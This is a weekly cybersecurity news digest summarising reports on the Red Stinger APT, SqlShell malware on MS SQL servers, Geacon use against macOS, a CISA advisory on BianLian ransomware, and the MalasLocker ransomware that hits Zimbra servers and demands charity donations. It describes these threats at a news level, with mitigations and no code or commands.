Take a look at this week's Cyber Weekly Digest for a rundown of the latest cyber security news. This week we dive into the ransomware operation demanding charity donations instead of ransom demands and the recent MacOS campaign utilising Cobalt Strike. Keep reading to stay up to date.
A previously undetected and unseen advanced persistent threat (APT) actor dubbed Red Stinger has been linked to attacks targeting Eastern Europe since 2020. A recently published report noted, "Military, transportation, and critical infrastructure were some of the entities being targeted, as well as some involved in the September East Ukraine referendums”. “Depending on the campaign, attackers managed to exfiltrate snapshots, USB drives, keyboard strokes, and microphone recordings.” Red Stinger overlaps with a threat actor tracked as Bad Magic, which last month was spotted targeting government, agriculture, and transportation organisations located in Donetsk, Lugansk, and Crimea last year. In this most recent campaign, Red Stinger has abused MSI installation trojans, dropping vbs scripts with encoded PowerShell arguments to download a further .DLL file. This next .DLL file creates a C2 client called DBoxShell to connect back to cloud services as a C&C mechanism.
Poorly managed Microsoft SQL (MS SQL) servers are the target of a new campaign that’s designed to propagate a category of malware called CLR SqlShell that ultimately facilitates the deployment of cryptocurrency miners and ransomware. A recent report noted that “Similar to web shell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behaviour,”. A stored procedure is a subroutine that contains a set of SQL statements for use across multiple programs in a relational database management system (RDBMS). “SqlShell can install additional malware such as backdoors, coin miners, and proxyware, or it can execute malicious commands received from threat actors in a way similar to WebShell”.
Geacon, a Go-based implementation of the beacon from the widely abused penetration testing suite Cobalt Strike, is being used increasingly to target macOS devices. Both Geacon and Cobalt strike are utilities that legitimate organisations use to simulate attacks against their networks and improve defences, but threat actors have also relied on them for attacks. In the case of Cobalt Strike, threat actors have been abusing it to compromise Windows systems for years, with the infosec industry making a continuous effort to fight it. Security researchers at SentinelOne monitoring Geacon activity in the wild have noticed increased payloads on VirusTotal lately. Although some showed signs of being part of a red team operation, others had the traits of malicious attacks. While SentinelOne agrees that some of the observed Geacon activity is likely linked to legitimate red team operations, there is a good chance that real adversaries “will make use of the public and possibly even the private forks of Geacon.”
A published advisory from the government agencies in the US and Australia by the Cybersecurity and Infrastructure Security Agency (CISA) is warning organisations of the latest tactics, techniques, and procedures (TTPs) used by the BianLian ransomware group. BianLian is a ransomware and data extortion group targeting entities in the US and Australian critical infrastructure since June 2022. BianLian initially employed a double-extortion model, encrypting systems after stealing private data from victim networks and then threatening to publish the files. However, since January 2023, when Avast released a decryptor for the ransomware, the group switched to extortion based on data theft without encrypting systems. CISA’s advisory warns that BianLian breaches systems using valid Remote Desktop Protocol (RDP) credentials, possibly purchased from initial access brokers or acquired through phishing. The recommended mitigations refer to limiting the use of RDP and other remote desktop services, disabling command-line and scripting activities, and restricting the use of PowerShell on critical systems.
A new ransomware operation is hacking Zimbra servers to steal emails and encrypt files. However, instead of demanding a ransom payment, the malicious adversaries claim to require a donation to charity to provide an encryptor and prevent data leaking. The ransomware operation, dubbed MalasLocker, began encrypting Zimbra servers towards the end of March 2023, with victims reporting in both the BleepingComputer and Zimbra forums that their emails were encrypted. Numerous victims in the Zimbra forums report finding suspicious JSP files uploaded to the /opt/zimbrjetty_base/webapps/zimbra/ or /opt/zimbra/jetty/webapps/zimbra/public folders. These files were identified on VirusTotal and by BleepingComputer to be based on an open-source webshell. When encrypting email messages, no extra file extension is appended to the file’s name. However, security researcher MalwareHunterTeam told BleepingComputer that they append a “This file is encrypted, look for README.txt for decryption instructions” message at the end of every encrypted file.